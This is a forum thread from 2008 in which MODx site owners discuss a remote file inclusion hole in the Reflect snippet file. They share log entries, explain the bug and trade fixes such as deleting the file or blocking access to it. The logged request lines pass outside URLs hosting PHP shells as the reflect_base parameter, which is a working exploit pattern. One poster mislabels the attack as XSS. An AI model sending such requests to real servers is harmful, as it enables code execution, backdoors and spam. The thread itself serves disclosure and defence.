next »

[julien04]

Hi,

My 0.9.6.2 Modx site has been hacked with a reflect  snippets hack :
http://www.milw0rm.com/exploits/7204

Is this hack know here ?

I've seen these GET in my logs :
IP www.mymodxsite.com - [24/Nov/2008:10:15:12 +0100] "POST //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.adultfirstdate.com/forum/spider.txt?? HTTP/1.1" 200 1138 "referer" "Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1"

He load a php script for testing security and upload others scripts easyly.

Sorry for my bad english speaking.

Julien

[shamblett]

I seem to be getting these also on my 0.9.6.1p2 install, from various IP's but I'm returning either 404's or 200's with no output.

[julien04]

No outpout he can execute php on your serveur.

On my serveur, he use snippet.reflect.php to load a "php shell"
Then he use this script to upload 2 php files (a mailler for spam and another php shell)
then he was spamming .....

[Kleist]

I think a fast fix would be to simply remove the file /assets/snippets/reflect/snippet.reflect.php, It shouldn't affect your usage of the Reflect snippet.

It contains the code for pasting into a snippet, and is not meant for being run on it's own.

The reason this hack works it the following two lines:

Code:

$reflect_base = isset($reflect_base) ? $modx->config['base_path'].$reflect_base : $modx->config['base_path']."assets/snippets/reflect/";
...SNIP...
require($reflect_base."configs/default.config.php");

Since this file is called directly, $modx is not set, and hence $modx->config['base_path'] is an empty string, and $reflect_base is just $reflect_base. So whatever file is given as argument is loaded.

[Kleist]

I filed a report to Trac for the Ditto project.

http://mirror3.cvsdude.com/trac/ditto/codebase/ticket/109

[ncrossland]

if I try that, it gives an error:

Code:

Warning: require(assets/snippets/reflect/configs/default.config.php) [function.require]: failed to open stream: No such file or directory in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60

Fatal error: require() [function.require]: Failed opening required 'assets/snippets/reflect/configs/default.config.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60

[Kleist]

if I try that, it gives an error:

You probably have register_globals set to off?
 
If I analyzed the code correctly, the bug is only present with register_globals=on.

[heliotrope]

Hi,

as the snippet is stored in db the file is useless and should be deleted.
I'm currently trying a patch on one of my site that has been attacked.
I've added at the beginning of the file

if(empty($modx->config)) die ('you should not be there !');

This should do the trick

:-)

EDIT: this fix should be tweaked in case of the $modx->config is filled within the hack.

[Kleist]

I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

Another way would be not to put snippet contents up as files (especially with the php-extension).

If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

[BobRay]

I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

Another way would be not to put snippet contents up as files (especially with the php-extension).

If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

Another way might be to set a $_SESSION variable somewhere else (e.g. in Ditto) to a hash of a modx config variable and then check for it at the beginning of reflect snippet.

[ncrossland]

We've many ModX installations on our server, so even though we have register_global=off which meant there was never any danger, as a quick fix yesterday I ran the following command (from root), just to deny any access to the file (without deleting it for now, just until it was confirmed it is not needed).

Code:

find . -name "snippet.reflect.php"  -exec chmod 0000 '{}' \;

We should now be able to remove them all with:

Code:

find . -name "snippet.reflect.php"  -exec rm -f  '{}' \;

Thought I'd pass it on in case it is useful to anyone.

[kp52]

I just spotted a heap of accesses to a Reflect file like the following in my logs:
GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1
 
Is this the same kind of thing as above? What is it actually trying to do?

[Kleist]

Yes, it's the same.

It's trying to run it's own PHP-code on your server. The file http://www.tecfedericotaylor.edu.gt/gif/prc.gif contains PHP-code. (Try save as, and give it the extension txt instead of gif to see it.)

This particular script seems to only gather and show info about the server, others do a lot more harm, like installing backdoors, adding MODx pages, etc.

[MotSmart]

Access denied
The requested URL could not be retrieved

While trying to retrieve the URL:

http://www.tecfedericotaylor.edu.gt/gif/
prc.gif

The following error was encountered:

The requested object is INFECTED with the following viruses: Trojan.PHP.Agent.a


Please contact your service provider if you consider it incorrect.
Generated:
Tue Nov 25 16:14:18 2008
Kaspersky Internet Security 2009

[Kleist]

That security warning is a bit weird. If you try to save the gif-file as a txt-file and look at the code. (And know a little bit PHP). You'll see that the only thing it does is gather and show information.

Obviously it can be used for some bad stuff by including it in the reflect-snippet. But in itself I see no way that it could harm you, unless you put it up on your webserver and let other people access it...

[Chuck]

The logs for one of my sites show hundreds of requests for the reflect script starting on Sunday around 5pm MT and continuing regularly through this morning (39 hours).  I have renamed the reflect file for now.  Apache access log indicates codes 500, 200 and 404 for the attempts on the reflect file.  The error log is filled with notices and warnings of undefined variables, properties of non-objects and failures to open streams.  The 200 means OK and has me digging deeper into what has been happening.  My website file counts and file sizes all appear to be in order so far after an initial inspection.  More to come...

[MotSmart]

That security warning is a bit weird. If you try to save the gif-file as a txt-file and look at the code. (And know a little bit PHP). You'll see that the only thing it does is gather and show information.

Obviously it can be used for some bad stuff by including it in the reflect-snippet. But in itself I see no way that it could harm you, unless you put it up on your webserver and let other people access it...

Most of the time AV's are just detecting Viruses by their HEX signature combination that easily could be changed in any order leaving the application functionable but not recognized as an infected app, Same regulations or better to say same logic is applied by AV's to recognize possible danger from server side scripting languages parameters, because they trace & combine the code not making a decision on scripts output or result. whoo... well again most of the time they may fail to recognize which script is right or wrong but for the code itself i trust the AV's detection.

[ZAP]

It's always seemed like a bad idea to me to ship snippet code (which is only intended to be copied and pasted into the Manager) with a .php extension. I think that this practice should be discontinued entirely. If these files are shipped with .txt extensions then there'd be no need to study and resolve possible security implications of running them independently (a context in which they were never intended to be used).

This example also demonstrates the utter folly of trying to keep your server secure while leaving register_globals set to ON. If you do this, then you should expect to be hacked at some point, since defending against every possible XSS attack while running any complex application like MODx is extremely difficult. Just changing that one setting in your .htaccess or php.ini file will allow you to sleep much better at night and spend your time doing more productive or enjoyable things.

If you have register_globals set to OFF then you are not vulnerable to this attack or any similar XSS attack.

[MotSmart]

It's always seemed like a bad idea to me to ship snippet code (which is only intended to be copied and pasted into the Manager) with a .php extension. I think that this practice should be discontinued entirely. If these files are shipped with .txt extensions then there'd be no need to study and resolve possible security implications of running them independently (a context in which they were never intended to be used).

+1 on that.

[Chuck]

If you have register_globals set to OFF then you are not vulnerable to this attack or any similar XSS attack.

Interesting, the Secunia advisory doesn't say anything about register_globals and instead sites magic_quotes_gpc.  Does register_globals off "trump" magic_quotes_gpc disabled?

http://secunia.com/Advisories/32824/

"Successful exploitation requires that "magic_quotes_gpc" is disabled."